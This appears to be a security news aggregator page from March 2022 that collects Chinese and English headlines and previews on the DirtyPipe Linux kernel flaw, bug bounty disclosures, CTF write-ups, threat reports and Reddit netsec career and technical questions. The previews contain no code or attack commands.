    安全合规是不少企业的痛点,在CIS2021 春日版安全合规专场,5位大咖通过各自具有建设性的议题,探讨企业合规建设之路。
    CIS 2021春日版「5G与人工智能安全」专场议题回顾:5G助力安全走上快车道
    人工智能与产业结合推动爆发式增长是未来我国移动互联网发展的重大趋势之一。这样的大背景下,网络信息安全也被赋予了更广泛更深刻的定义。
    黑客使用受污染的DDoS工具瞄准乌克兰的IT军队
    威胁参与者正在使用 一种模仿Liberator的窃取信息恶意软件,这种工具是亲乌克兰黑客用于攻击俄宣传网站的常用工具。
    汽车之家招聘网络安全实习生
    汽车之家成立于2005年,致力于为消费者提供一站式的看车、买车、用车服务,提供优质的汽车消费和汽车生活服务。
    浅谈云时代如何解决身份管理
    基于云的 OneAuth 服务可以通过在所有这些应用程序中提供单点登录 (SSO) 来缓解这些问题,为用户提供一个使用单个用户名和密码访问其所有资源的中心位置。
  • Open

    Linux 内核权限提升漏洞“DirtyPipe”(CVE-2022-0847)分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 漏洞详情 近日,研究人员披露了一个Linux内核本地权限提升漏洞,发现在copy_page_to_iter_pipe和 push_pipe函数中,新分配的pipe_buffer结构体成员“flags”未被正确地初始化,可能包含旧值PIPE_BUF_FL...
    Linux 内核权限提升漏洞“DirtyPipe”(CVE-2022-0847)分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 漏洞详情 近日,研究人员披露了一个Linux内核本地权限提升漏洞,发现在copy_page_to_iter_pipe和 push_pipe函数中,新分配的pipe_buffer结构体成员“flags”未被正确地初始化,可能包含旧值PIPE_BUF_FL...
    Linux 内核提权 DirtyPipe(CVE-2022-0847) 漏洞分析
    作者:ghost461@知道创宇404实验室 时间:2022年3月11日 简介 2022年2月23日, Linux内核发布漏洞补丁, 修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847), 该漏洞可导致普通用户本地提权至root特权, 因为与之前出现的DirtyCow(CVE-2016-5195)漏洞原理类似, 该漏洞被命名为DirtyPipe。 在3月7日, 漏...
    Linux 内核提权 DirtyPipe(CVE-2022-0847) 漏洞分析
    作者:ghost461@知道创宇404实验室 时间:2022年3月11日 简介 2022年2月23日, Linux内核发布漏洞补丁, 修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847), 该漏洞可导致普通用户本地提权至root特权, 因为与之前出现的DirtyCow(CVE-2016-5195)漏洞原理类似, 该漏洞被命名为DirtyPipe。 在3月7日, 漏...
  • Open

    Linux 内核权限提升漏洞“DirtyPipe”(CVE-2022-0847)分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 漏洞详情 近日,研究人员披露了一个Linux内核本地权限提升漏洞,发现在copy_page_to_iter_pipe和 push_pipe函数中,新分配的pipe_buffer结构体成员“flags”未被正确地初始化,可能包含旧值PIPE_BUF_FL...
    Linux 内核权限提升漏洞“DirtyPipe”(CVE-2022-0847)分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 漏洞详情 近日,研究人员披露了一个Linux内核本地权限提升漏洞,发现在copy_page_to_iter_pipe和 push_pipe函数中,新分配的pipe_buffer结构体成员“flags”未被正确地初始化,可能包含旧值PIPE_BUF_FL...
    Linux 内核提权 DirtyPipe(CVE-2022-0847) 漏洞分析
    作者:ghost461@知道创宇404实验室 时间:2022年3月11日 简介 2022年2月23日, Linux内核发布漏洞补丁, 修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847), 该漏洞可导致普通用户本地提权至root特权, 因为与之前出现的DirtyCow(CVE-2016-5195)漏洞原理类似, 该漏洞被命名为DirtyPipe。 在3月7日, 漏...
    Linux 内核提权 DirtyPipe(CVE-2022-0847) 漏洞分析
    作者:ghost461@知道创宇404实验室 时间:2022年3月11日 简介 2022年2月23日, Linux内核发布漏洞补丁, 修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847), 该漏洞可导致普通用户本地提权至root特权, 因为与之前出现的DirtyCow(CVE-2016-5195)漏洞原理类似, 该漏洞被命名为DirtyPipe。 在3月7日, 漏...
  • Open

    Gallery Tryhackme Walkthrough part-1
    No content preview
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows an new to the scene! Continue reading on InfoSec Write-ups »
  • Open

    Gallery Tryhackme Walkthrough part-1
    No content preview
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows an new to the scene! Continue reading on InfoSec Write-ups »
  • Open

    Gallery Tryhackme Walkthrough part-1
    No content preview
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows an new to the scene! Continue reading on InfoSec Write-ups »

  • Open

    XSS via Mod Log Removed Posts
    Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1504410 - Bounty: $6000
    Open Redirect on https://.8x8.com/login?nextPage=%2F
    8x8 disclosed a bug submitted by ig420_vrush: https://hackerone.com/reports/1467046
  • Open

    How I was able to read any users confidential reports on a public level domain
    Hello all, today’s write up is about how I chained IDOR with BAC to read any users confidential reports on a public domain (we will call… Continue reading on Medium »
    Bypassing CSRF token protection by abusing a misconfigured CORS policy
    So, today I am going to teach you about a cool and interesting way of bypassing the token protection used against CSRF attacks by finding… Continue reading on Medium »
    Explore DeNet ecosystem and get a reward
    DeNet users can benefit while just exploring the ecosystem: perform tasks and simply check-in the app. Continue reading on DeNet | DFILE »
    Nexus Mutual Bug Bounty Matching Program Pays $200,000 To Whitehat
    The Nexus Mutual trial bug bounty matching program has just provided its first matching payout as part of its partnership with Immunefi: a… Continue reading on Immunefi »
  • Open

    CrowdSec releases first threat landscape report based completely on crowdsourced data from the community of CrowdSec users
    submitted by /u/klausagnoletti [link] [comments]
  • Open

    Moving from support engineer to cyber security?
    Hello. Soon I start a support engineer job making 60k. Can I get a security analyst job after with the right certifications? Should I look for an NOC Job or something similar. Will that make at least 60k. What should I do? submitted by /u/throwaway_69333 [link] [comments]
    increasing range of wifi adapter
    So is there a way to increase the range of my awus1900 ? the only way for me to connect to a wifi far away is to throw it out the window like literally XD i was thinking like an bigger antenna for it if that would work, it already has very good range but i find that it cant connect to wifis even tho it sees them if they are like 50meters away tried putting it up on the roof but the range was better on the ground with all the buildings blocking it for some reason well i have no idea how this works so thats why im asking submitted by /u/Y0SH1zzzz [link] [comments]
    GCP Security Audit
    Hi there, I never had experience with Google Cloud Platform. There is a possibility to make fast audit of: Publicly exposed GCP hosts; GCP permissions for assigning external IP; GCP firewall rules For all projects (I have 40 projects) in organization? submitted by /u/athanielx [link] [comments]
    Streaming websites asking for script permission
    Hey, some websites I've visited asks for permission to run a script called ????.com/remote_control.php, it gets blocked by NoScript. Wondering if this is a common script used in video streaming or if it is as malicious as it sounds? submitted by /u/Pollyypop [link] [comments]
    Does Alienvault upload any of our data?
    Hi Guys, We're looking to deploy Alienvault OSSIM in our environment as a SIEM monitoring tool. I have reviewed this with my team and the major concern we have is whether Alienvaul uploads any of our data into the cloud and what exact data do they upload but I can't seem to find any resources online that explicitly state that. I was wondering if anyone here has any ideas/knowledge on this? Also happy if anyone has any suggestions on other free and open-source SIEM tools that can be used. submitted by /u/thetayoo [link] [comments]
    Career Switch 2.0
    Hey guys.. So... I would like to ask you guys a couple of things as this is gonna be a very new topic and a new chapter for me in my life. I am 27 y/o knows batxhit about software/coding/development etc. I am always smart when it comes to the hardware side of computers and mobile devices. Always find the fixes around and get the thing up and running. However, I want to get into EH or a related field Anyways, I have been in customer service for the past 7 years and that was because I was not able to pursue my dream in IT as I was broke T_T. But now I got the chance of either shifting to another country and learning and finding a job or staying here and finding a job.. So I would like to ask a few couples of questions from you guys about how tough and how badly gonna it affect me as it's a whole next level chapter for me. Note that, I am bad at maths. (like i never learnt it in advance level) What is the study path? What's the best country to shift to for studies? (Thinking of Canada/US/UK) Is it necessary for me to start from scratch like doing a certificate > diploma > degree > masters or whatever? Sites/platforms where I could study things related to the field? How badly is it going to affect me with the switch since it is all new? What are the pros and cons of getting into this field? Any other advice or suggestions that comes to your head. :) Edit : One more point I would like to add after seeing the comment from this guy; What's the study path and career path for Hardware hacking? Thank you so much! Love you all <3 submitted by /u/PapadumSriLanka [link] [comments]
    Tenable - Audit Scan - No result
    Hello AskNetsec, I am trying to run a CIS L1 Compliance scan on my Microsoft Windows Server 2012 R2 Datacenter, and Microsoft Windows Server 2016 Datacenter though I keep getting no results. When I run a Debug scan it says the following: "Nessus has not identified that the chosen audit applies to the target device." It might be the case, though I am unsure as to what CIS scan to use instead. I would appreciate your help on this case. Thank you in advance. ________________________________________________________________________ Device full name, OS and version: "Mircrosoft Windows Server 2012 R2 Datacenter 6.3.9600" Chosen CIS: "Cis Windows Server 2012 DC L1 v2.2.0" And: "Cis Windows Server 2012 R2 DC L1 v2.5.0" _________________________________________________________________________ Device full name, OS and version: "Mircrosoft Windows Server 2016 Datacenter" Chosen CIS: "Cis Windows Server 2016 DC L1 v1.3.0" submitted by /u/Gabbana2 [link] [comments]
    Potential doxx advice
    I was advised by a reply in r/AskComputerScience to post here, so here it is. ​ Hi I was on a call with someone on Discord who I didn't know on a personal level and they told me some information about myself that is not public anywhere e.g. my full name, address etc (my Discord also is not linked to anything except my Steam account). I was wondering if anyone has any insight on how they managed this. It has quite shook me up as I have never had this happen to me before as I am as careful as I can be with what information I give out online and always have been. Thanks submitted by /u/Confident_Lobster180 [link] [comments]
  • Open

    Ask HN: How would the Dirty Pipe vulnerability be exploited on Android?
    I have seen articles claiming that the Dirty Pipe vulnerability could cause security issues and even root access on Android devices with the vulnerable kernel version. Can you explain how this would happen, as I presume each applications is isolated through virtualization? Comments URL: https://news.ycombinator.com/item?id=30629680 Points: 2 # Comments: 1
  • Open

    If you're interested, the Microsoft Detection and Response Team (DART) will be holding an AMA next Tuesday on Tech Community answering questions on incident response and more
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-03-10 Review
    使用 CodeQL 分析 Dubbo RCE by ourren 基于依赖性分析的软件供应链评估指标对预测npm包的流行程度变化 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-10 Review
    使用 CodeQL 分析 Dubbo RCE by ourren 基于依赖性分析的软件供应链评估指标对预测npm包的流行程度变化 by ourren 更多最新文章,请访问SecWiki
  • Open

    Pentesting toolkit: all you need to know
    “A Penetration Test is a technical assessment designed to achieve a specific goal.” Continue reading on Faraday »
    My Red Team Approach
    Initially, we conduct passive and active information gathering from publicly available sources to analyze which information is valuable… Continue reading on Medium »
    Red Team Tricks And Techniques
    Why Do I use VBA? Continue reading on Medium »
    Reflective DLL Injection
    Reflective DLL injection is a code injection technique that loads into a target process from memory. Reflective DLL injection is… Continue reading on Medium »
  • Open

    Rust fuzzing using cargo-libafl (LibAFL-based fuzzer)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    K8S安全学习(一)
    最近在学习K8S相关云原生技术,因为工作中正好接触到,便一直想找个机会深入学习一下这个方向的利用与防御,于是便有了这篇文章
    从网络空间认知战到对俄大规模网络致瘫攻击
    此次监测到的大规模网络攻击事件,战术手段和攻击发动方式历史鲜有,绿盟科技天元实验室对此次网络攻击进行了详细的技战术研判分析。
    21万FB用户「跨越时空」共享CIS 2021春日大会
    数说CIS 2021大会春日版,我们用数据呈现答案。
    FreeBuf早报 |多家俄政府网站遭到供应链攻击;英公布新规以应对激增的诈骗广告
    多家俄罗斯政府网站遭到供应链攻击一些俄罗斯联邦机构的网站遭遇了供应链攻击,攻击者破坏了一些政府机构用来跟踪访问者数量的统计工具。
    CIS2021 DevSecOps应用与技术专场圆满落幕,网安大咖共话安全
    3月10日上午,CIS2021 DevSecOps应用与技术专场在FreeBuf官网全程直播,与万千网友共享,一同欣赏精彩的议题。
    CPU又曝大bug,涉及英特尔、AMD、ARM
    安全人员发现了一种新方法,可以绕过现有的基于硬件的防御措施,在英特尔、AMD和ARM的计算机处理器中进行推测执行。
    ​APP合规实践3000问之二
    上一篇文章《App合规实践3000问》发出后得到了大家的热烈反响,盼望着,盼望着,我们带着合规实践3000问第二篇大步走来了。
    小数据人工智能的巨大潜力
    我们从研究进展、国家竞争力和资金方面介绍了我们对研究集群中所有论文的研究结果。我们希望通过这些分析,发现这些方法的当前和预期科研进展,判断哪个国家处于领先地位以及这项研究的主要资金来源。
    【完整版PDF下载】Conti泄露数据完整分析,疑似成员身份被曝光!
    俄乌冲突加剧,黑客团队选边加入。2月27日Conti 勒索软件组织的内部数据遭到大量泄露,从聊天记录到疑似成员身份被曝光。
    CIS 2021 春日版数据安全论坛圆满落幕,精彩议题不容错过
    数据安全论坛深入探讨最新的数据安全保护技术、最佳的运营体系。
    惠普解决了16个影响笔记本电脑、台式机、PoS 系统的UEFI固件缺陷
    近期,网络安全公司Binarly研究人员发现16个影响惠普企业设备的统一可扩展固件接口高危漏洞。
    智能化车联网面临安全考验
    随着汽车联网率的不断提升,预计未来此类安全问题将更加突出。
  • Open

    Digital Forensics
    Hello all. Had a question, I've been looking for a internship in Digital Forensics. Any suggestions, been looking everywhere. Just want to get my foot in the door. Or anyone that can mentor me. I'm in the USA. submitted by /u/Sudden_Ad9859 [link] [comments]
    Forensic collections of O365 mailboxes
    As the title suggest, what are people using/doing to collect O365 mailboxes that is not using the Microsoft Compliance eDiscovey portal. aka Nuix Workstation (GraphAPI), MailStore Client, so on so forth. Any information on pro's and con's for the method you use and any possible hiccups you have found during the course of using these apps. submitted by /u/Phorc3 [link] [comments]
  • Open

    先知蜘蛛黑客利用 CVE-2021-22941漏洞传送Webshell
    译者:知道创宇404实验室翻译组 原文链接:https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ 2022年初,CrowdStrike Intelligence 和 CrowdStrike Services 调查了一起事件,在这起事件中,PROPHET SPIDER(先知蜘蛛) 利用了影响 Ci...
    先知蜘蛛黑客利用 CVE-2021-22941漏洞传送Webshell
    译者:知道创宇404实验室翻译组 原文链接:https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ 2022年初,CrowdStrike Intelligence 和 CrowdStrike Services 调查了一起事件,在这起事件中,PROPHET SPIDER(先知蜘蛛) 利用了影响 Ci...
  • Open

    先知蜘蛛黑客利用 CVE-2021-22941漏洞传送Webshell
    译者:知道创宇404实验室翻译组 原文链接:https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ 2022年初,CrowdStrike Intelligence 和 CrowdStrike Services 调查了一起事件,在这起事件中,PROPHET SPIDER(先知蜘蛛) 利用了影响 Ci...
    先知蜘蛛黑客利用 CVE-2021-22941漏洞传送Webshell
    译者:知道创宇404实验室翻译组 原文链接:https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ 2022年初,CrowdStrike Intelligence 和 CrowdStrike Services 调查了一起事件,在这起事件中,PROPHET SPIDER(先知蜘蛛) 利用了影响 Ci...
  • Open

    [ Hack The Box ] Intel - Writeup
    It seems a huge trove of credit card details is being sold by a group going by the name flinchsec. Can you find any sites or artefacts… Continue reading on Medium »

  • Open

    Helpful Bug Bounty Resources
    Eight resources to help you on your bug bounty journey Continue reading on Medium »
    Hacking with sqlmap
    Sqlmap : Continue reading on Medium »
    OTP bypass via response manipulation and brute forcing.
    Hello Hackers, Continue reading on Medium »
    Introduction to Simple Buffer Overflow
    This article will provide an overview of exploit development, with a focus on creating Simple Buffer Overflow exploits. I’ll try to keep… Continue reading on Medium »
    The 10 Best Programming Languages for Hacking
    Before diving into this, it would be great to note that your programming of choice will much depend on the type of system you are… Continue reading on Medium »
    How To Become a Good Hacker? The Fundamental Skills
    These are the basics that every hacker should know before even trying to hack. Once you have a good grasp on everything in this section… Continue reading on Medium »
  • Open

    Do you grind or just learn on your own pace?
    Hii, So I just graduated 2 months ago. I did one interview with a super cool guy in a cyber security company for a infosec job. He helped me a lot and liked the way i think although i had many shortcomings. He told me to study network+ and eLearnsecurity web penetration. And to keep practicing on hackthebox. Then interview again The problem is that i have a military service in 4 months,and it’s obligated. Currently i am studying Mike Myers on Udemy for networks+ i read some refrence books sometimes. And when i finish it i will start building my own network lab on gns3. For the practical side i am practicing on hackthebox,just ranked from noob to script kiddie. I still read writeups a lot and get stuck after i find a vulnerability or sometimes even at enumeration. My question is that,did you ever grind and work hard to achieve bigger outcomes in shorter time? I feel like i should study more ,i mean like i should stay up all night 2 days a week to finish all of that . And i feel like i should spend almost all of my day hacking. Sure i can go out for an hour or two ,but that is that. I fear i will have a burnout but i also fear that i will keep learning basic stuff and take me forever to land a job. I want to be a pro and i know it’s fucking hard but this is my passion since i used to create RATS during high school. I feel i should give it everything i have. I am introvert with almost no friends anyways so why not ? is grinding mindset useful here? submitted by /u/Ramseesthe4th [link] [comments]
    Security risk analysis from Trojan?
    Hi there, Usually I'm very vigilant and can easily spot most net security scams and am educating others on how to avoid them. However at one of my jobs I've been waiting on someone to send me a report for a few weeks now and when an e-mail came up today on my work e-mail that looked to be that report, I finally fell for a viral e-mail. Basically the report was on a spreadsheet that I downloaded on the email through Thunderbird. It said that I needed to enable editing or press the view in browser button. This didn't make any sense to me and there was no "enable editing" thing that it mentioned, so that did ring alarm bells, but because I was waiting on a similar report from my upper manager, I ignored that and pressed the view in browser button. Now I'm not sure if this was prompted by my…
    Vulnerability Management
    Tracking Sec+ as a foundational certification but what additional certifications are valuable to have when seeking employment in the vulnerability management field? submitted by /u/5Crabby1s [link] [comments]
    SNMPv3 Password best practice.
    I have taken over a 15 segment switch network that has been neglected in the use of best practices for many years. I have migrated from telnet to ssh, local logins to RADIUS, and so on. The only push back from my coworkers is the users and passwords for SNMPv3. They want each segment have it own user and password, i.e. admin1 password1 for site 1, user2 password2 for site 2. We do this for the local passwords in case the site can't reach the RADIUS server. I do not care per say but I can't find any useful information on this particular topic and the monitoring systems we use make it difficult to set up SNMPv3 alone and it goes down hill from there when setting up multiple users and passwords. In addition, we only use SNMP for monitoring. Can anyone direct me to some good information on this topic or if the can take a moment of their time to explain it here? - Thank you in advance submitted by /u/NetworkRex [link] [comments]
    How could Russian military communication system require 3G or better to work?
    Christo Grozev, leader of Bellingcat, claims the Russian military communication system Quartz (or Era) requires UMTS (3G) bandwidth in order to work. Or at the very least, I assume it's the bandwidth requirement which makes GSM (2G) insufficient. https://twitter.com/christogrozev/status/1500978613113524229?s=20&t=coMiAhwmqZQY5Wh60W9h4A I would have guessed Russian military phones used familiar protocols from the good old TLS suite. I.e. RSA/ECDSA for key exchange, AES for symmetric keys, and pre-installed FSB root CAs and individual client certs. Do you have any hypothesis on what design Quartz could have to make GSM bandwidth insufficient? Allegedly, two Russian operatives had to resort to unprotected GSM for a phone call. How is it possible that their encryption suite creates a so heavy data overhead? Do you have other hypotheses, unrelated to bandwidth requirements? submitted by /u/engineerL [link] [comments]
    How a Front-End Developer can get into Netsec?
    Hi everyone! I'm a 23 year old Web Dev (working for 3 years). Few mouth ago I decided that I wanted to change the direction of my career and get into cyber security. My ultimate goal or a dream job in security would be probably to become a penetration tester that works with a team of experts on getting into businesses through the network vunrebilities, services misconfiguration or physically by phishing, social engineering and trying to get in the building (of course legally) I recon it's a very specialised job and definitely not an entry level but I think it's important to mention the end goal to get the whole picture. I researched a lot about becoming a pentester. I spend my time on TryHackMe as well as rooted some retired machines on HackTheBox of course using Kali, yet, I feel I lack A LOT of knowledge and credibility, so here lies my problem. I fell into a rabbit hole of googling "which cert is the best", "how to become X", "best way to Y". So rather than digging deeper and deeper I figured I'll just ask my own questions. Of course, what certs should I get? OSCP is an obvious answer, but I don't feel like I'm ready, also I never got a cert in my life AND it's pretty expensive (I'm not even gonna mention SANS) Sec+ and Net+ are great intro certs but they don't really help with HR and I'm not sure if my web experience is enough for me. I feel like a have an okay grasp on network and security concepts. eJPT and eCCP learn you a lot, but are even less recognized by HR than CompTIA ones Isn't it better to take a step back and first try to become a SOC or sysadmin? Preferably Linux sysadmin Should I just concentrate on HTB, start a blog, get a PEN-200 and push for OSCP? Isn't it too risky? PS. Im planing on moving to Germany so I also spend time learning the language and I have 7 mouth before a move out. I set myself a goal to get my Netsec job there. I hope what I said makes sense. submitted by /u/Anvvir [link] [comments]
    What's exactly considered DoS/DDoS attack? (Multiple Cases)
    Hey folks, I want to know exactly the definition and I'll tell you why it's confusing me. Here are some cases: 1. I sent a file that is actually an endless "while" loop. This means Dos attack is every way of denying service by making the server use too many resources. 2. I sent a file that actually stops all the services/processes every five seconds. This means DoS attack is actually every way of denying a service. 3. I just sending a lot of ethernet frames in different ways (ping, HTTP, whatever). This means Dos attack is every way of denying a service only by massive requests amount. ** I know it's kind of ridiculous, but if it's actually any way of denying service, would you also consider someone that physically disconnected the server cables as Dos attack? ** If the definition is number 1, 2 machines that sent the same file - considered already as DDoS? Thanks! ​ BTW, is there an official list of the most common Dos/DDos attacks types in the last years? submitted by /u/Webly99 [link] [comments]
    Threat Model Stakeholders from a security team?
    Who are the appropriate personnel to include in a threat model from a security standpoint? Security Architects? Engineers? SOC analysts?? Vulnerability management personnel? Compliance? submitted by /u/bankster24 [link] [comments]
    RBAC question
    Hello, I am not in cyber however I am developing an org structure as part of my school assignment. The roles I came up with that are part of driving the RBAC implementation are: Role Dev Lead, Role Eng. Lead, Role Decomm. Lead, Role Maint. Lead and Auditor Lead. Are they close to RL roles? Thanks! submitted by /u/Hav0c_wreack3r [link] [comments]
  • Open

    Use of Unsafe function || Strcpy
    curl disclosed a bug submitted by shobhit2401200: https://hackerone.com/reports/1485379
    Binary output bypass
    curl disclosed a bug submitted by eliasknudsen: https://hackerone.com/reports/1468962
    Occasional use-after-free in multi_done() libcurl-7.81.0
    curl disclosed a bug submitted by luminixaaron: https://hackerone.com/reports/1463013
    Error Page Content Spoofing or Text Injection
    Krisp disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1444031
    Unsubscripe linkes leaked
    Krisp disclosed a bug submitted by blackxxhat: https://hackerone.com/reports/1439025
    RXSS on https://equifax.gr8people.com on Password Reset page in the username parameter
    Equifax disclosed a bug submitted by miguel_santareno: https://hackerone.com/reports/1463638
    Race condition in endpoint POST fetlife.com/users/invitation, allow attacker to generate unlimited invites
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1460373 - Bounty: $100
    High memory usage for generating preview of broken image
    Nextcloud disclosed a bug submitted by fancycode: https://hackerone.com/reports/1261225 - Bounty: $100
  • Open

    Demystifying E-Commerce Website Security
    Having an E-Commerce website can have its fair share of risks these days. As a site owner that handles online payments, however, it’s even more important to understand said risks and the best methods of avoiding it from not only impacting your business but your customers as well. Here we’ll be discussing the main aspects that are important to an E-Commerce website, the kinds of vulnerabilities that can impact your business, and how to take better preventative measures. Continue reading Demystifying E-Commerce Website Security at Sucuri Blog.
  • Open

    What is OSINT? (Part 3)
    The rules of the trade Continue reading on Medium »
    ¿Qué es VenApp, la nueva red social de Venezuela?
    Hace unos días un conocido me pasó esto: @VenAppSocial. Al ingresar al perfil lo primero que vi fue la descripción: “¡La nueva red social… Continue reading on Medium »
    What is third-party risk management?
    Third-party risk management (TPRM) is a type of risk management that focuses on identifying and mitigating risks associated with the usage… Continue reading on CodeX »
    What is BYOD (Bring Your Own Device) Policy
    BYOD, or Bring Your Own Device, is a growing trend in which employees use their personal devices for work. Companies that implement BYOD… Continue reading on CodeX »
  • Open

    Branch History Injection - Circumventing Spectre-v2 Hardware Mitigations
    submitted by /u/LordAlfredo [link] [comments]
    Yarn, Pip, Composer & co: Vulnerabilities in popular package managers
    submitted by /u/SonarPaul [link] [comments]
    IDA Pro plugin: query based xref finder for vulnerability research
    submitted by /u/Martypx00 [link] [comments]
    Forgiva Enterprise: A password manager that never saves your passwords.
    submitted by /u/marcusfrex [link] [comments]
  • Open

    Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
    Introduction CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in The post Linux Privilege Escalation: DirtyPipe (CVE 2022-0847) appeared first on Hacking Articles.
  • Open

    Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
    Introduction CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in The post Linux Privilege Escalation: DirtyPipe (CVE 2022-0847) appeared first on Hacking Articles.
  • Open

    Revisiting Phishing Simulations
    Rethinking the way that we approach phishing as a component of red team operations Continue reading on Posts By SpecterOps Team Members »
  • Open

    SecWiki News 2022-03-09 Review
    用户视角下的网络威胁情报共享平台 by ourren CodeBERT: A Pre-Trained Model for Programming and Natural Languages by ourren 浅谈一下,Linux中基于eBPF的恶意利用与检测机制 by ourren 安全的未来是上下文 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-09 Review
    用户视角下的网络威胁情报共享平台 by ourren CodeBERT: A Pre-Trained Model for Programming and Natural Languages by ourren 浅谈一下,Linux中基于eBPF的恶意利用与检测机制 by ourren 安全的未来是上下文 by ourren 更多最新文章,请访问SecWiki
  • Open

    The Unique Challenges of Companies Born in the Cloud
    There are stark differences between how to manage security policies for on-premises network environments and those that are 100% cloud-based. But many companies continue to struggle with those differences and have experienced plenty of pain as a result. It’s a challenge Rich Mogull has spent years trying to help companies navigate. Mogull, CISO at Firemon, […] The post The Unique Challenges of Companies Born in the Cloud appeared first on Security Weekly.
  • Open

    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz [link] [comments]
  • Open

    AutoWarp: Vulnerability in Azure Cloud allows access to all company accounts
    Article URL: https://twitter.com/Yanir_/status/1500863874412724229 Comments URL: https://news.ycombinator.com/item?id=30614889 Points: 5 # Comments: 0
    APC Ups – Critical-Vulnerability
    Article URL: https://www.armis.com/research/tlstorm/ Comments URL: https://news.ycombinator.com/item?id=30612835 Points: 2 # Comments: 0
  • Open

    Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene
    Every day, new challenges, attacks, and vulnerabilities are publicized. Just as attackers and the threat landscape are constantly changing, adapting, and evolving, so too must the Blue Teams and defenders who protect organizations against these threats. While the old adage may have been that attacks are rare and unlikely to happen, a new mentality of... The post Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene appeared first on TrustedSec.
  • Open

    工业控制系统遭受网络攻击数量略有增加
    2021年全球遭受网络攻击的ICS设备比例略有增加,为39.6%,其中2021年下半年遭受网络攻击的比例仅为31.4%。
    专家观点:银行、保险业数字化转型的安全保障
    梆梆安全助力银行业保险业数字化转型
    CIS 2021春日版开启首日直播,10万观众线上为安全打Call
    精彩不止今日,CIS直播间与大家相约明早9点30分,准时守候~
    FreeBuf早报 | 人大代表建议共建数据合规治理平台;谷歌以 54 亿美元收购网络安全公司Mandiant
    谷歌母公司Alphabet周二宣布,计划以约54亿美元收购网络安全公司Mandiant。如果交易达成,它将成为谷歌有史以来第二大收购案。
    网络安全设备相关知识总结
    安全设备 1、防火墙
    APC UPS 零日漏洞可远程烧毁设备、断电
    近期跟进的一组三个关键的零日漏洞TLSstorm可以让黑客从施耐德电气的子公司APC控制不间断电源(UPS)设备
    深入浅出云原生环境信息收集技术(二)
    信息收集在攻击和防御两端都是非常重要的一环,优质的信息收集成果是后续工作顺利展开的首要条件。
  • Open

    【安全通报】2022年3月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年3月 安全补丁,修复了针对 29 款微软产品的 71 个CVE漏洞 (其中不包括 21 个 Micros...
  • Open

    【安全通报】2022年3月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年3月 安全补丁,修复了针对 29 款微软产品的 71 个CVE漏洞 (其中不包括 21 个 Micros...
  • Open

    Building a Red Team - Which C2 to pick?
    Hello redteamsec community, my company wants to enhance the actual security testing services from basic assessments and penetration tests to red team engagements. At the moment we are planning the Red Team Infrastructure and I am currently looking for the best pick of a C2 Framework. I checked out the following: - Covenenat - PoshC2 - Metasploit (if you can call it C2, you know what I mean) ​ Further on my list are: - Cobalt Strike - SilentTrinity - APfeil - FactionC2 - Merlin ​ What gives me a hard time is, how to decide on the framework we want to run? Thats why I ask you, what you guys recommend and WHY. Regards! submitted by /u/larryxt [link] [comments]
    A Summary of APT41 Targeting U.S. State Governments
    submitted by /u/dmchell [link] [comments]
  • Open

    Large-ish mp3 library (Full albums, but selection can be hit or miss)
    Edit: After some further searching I had to make an edit, I'm sorry, the Full albums are unreliable for consistency, they are there but it's not guaranteed for every artist so please don't get your hopes up too high if looking for a specific album! The songs that are there are good quality though, that much I can guarantee from my searches! http://www.ashleecadell.com/xyzstorelibrary/ submitted by /u/migali [link] [comments]
  • Open

    Phonebook, the way to DoS a company
    No content preview
    Healing blind injections
    No content preview
    How I created a Trojan Malware — Ethical Hacking
    No content preview
  • Open

    Phonebook, the way to DoS a company
    No content preview
    Healing blind injections
    No content preview
    How I created a Trojan Malware — Ethical Hacking
    No content preview
  • Open

    Phonebook, the way to DoS a company
    No content preview
    Healing blind injections
    No content preview
    How I created a Trojan Malware — Ethical Hacking
    No content preview
  • Open

    付费账单是假,Agent Tesla 攻击是真
    译者:知道创宇404实验室翻译组 原文链接:https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla 自网络钓鱼出现以来,欺诈性的付费账单一直是最常见的诱惑之一。通常的操作方法包括迎合接受者避免债务的愿望,尤其是在可能牵涉到商业利益的情况。 FortiGuard ...
    付费账单是假,Agent Tesla 攻击是真
